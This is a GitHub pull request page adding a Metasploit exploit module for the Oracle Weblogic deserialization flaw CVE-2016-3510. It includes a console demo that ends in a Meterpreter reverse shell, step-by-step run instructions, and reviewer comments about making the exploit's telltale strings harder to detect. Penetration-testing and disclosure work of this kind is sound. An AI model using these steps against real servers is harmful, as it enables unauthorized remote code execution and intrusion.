Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Weblogic_serialize_marshalledobject CVE-2016-3510 #11134

Merged
merged 8 commits into from
Apr 1, 2019
Merged

Add Weblogic_serialize_marshalledobject CVE-2016-3510 #11134

merged 8 commits into from
Apr 1, 2019

Conversation

acamro
Copy link
Contributor

@acamro acamro commented Dec 16, 2018
edited
Loading

Hi everyone,
Please, add this exploit module for CVE-2016-3510, Oracle Weblogic Deserialization Vulnerability,
It was tested on Windows 7 x64 with Oracle Weblogic Server v10.3.6.0 and v12.1.3.0

TODO

Test on Linux
Test on Solaris
Improve the documentation

DEMO

 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
 rhost => 192.168.192.6
 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit

 [*] Started reverse TCP handler on 192.168.192.136:4444 
 [*] 192.168.192.6:7001 - Sending handshake...
 [*] 192.168.192.6:7001 - Sending T3 request object...
 [*] 192.168.192.6:7001 - Sending client object payload...
 [*] Sending stage (179779 bytes) to 192.168.192.6
 [*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800

 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows

Verification

  • Start msfconsole
  • use exploit/multi/misc/weblogic_deserialize_marshalledobject
  • set rhost
  • set rport
  • exploit
  • Enjoy!!!

@asoto-r7
Copy link
Contributor

@acamro : I apologize for the delay. It took me a while to work through everything here, but I've just pushed a commit to your branch with my reverse engineering of the JSOs in the module. In addition, the module now uses the ysoserial functionality added in #11125.

Remaining, I'd like to see if we can't figure out what the remaining blobs do (they're marked with #TODOs) and also see if we can randomize some of the telltale strings like computer names and IP addresses that seem to have no impact on the success of the exploit (also marked with #TODOs).

I'll have a similar commit on the #11131 PR in just a moment, then I'll be turning my attention to #11136, which gets more complex... 😬

Thanks for your patience! Feel free to tackle those #TODOs if you get a chance. Otherwise, I'll circle back tomorrow.

@asoto-r7 asoto-r7 mentioned this pull request Feb 20, 2019
Merged
6 tasks
@asoto-r7 asoto-r7 merged commit 5f84cbc into rapid7:master Apr 1, 2019
asoto-r7 pushed a commit that referenced this pull request Apr 1, 2019
Land #11134, exploit/multi/misc/weblogic_serialize_marshalledobject
f292bef
msjenkins-r7 pushed a commit that referenced this pull request Apr 1, 2019
@msjenkins-r7
Land #11134, exploit/multi/misc/weblogic_serialize_marshalledobject
77313e2
@asoto-r7
Copy link
Contributor

asoto-r7 commented Apr 1, 2019
edited by tdoan-r7
Loading

Release Notes

The Oracle Weblogic Server Deserialization RCE module exploits a vulnerability in Oracle Weblogic Server v10.3.6.0 and v12.1.3.0. It provides an attacker with highly-reliable, unauthenticated remote code execution via a java deserialization vulnerability.

@tdoan-r7 tdoan-r7 added rn-exploit rn-modules release notes for new or majorly enhanced modules labels Apr 15, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@asoto-r7 asoto-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@acamro @asoto-r7 @bcoles @tdoan-r7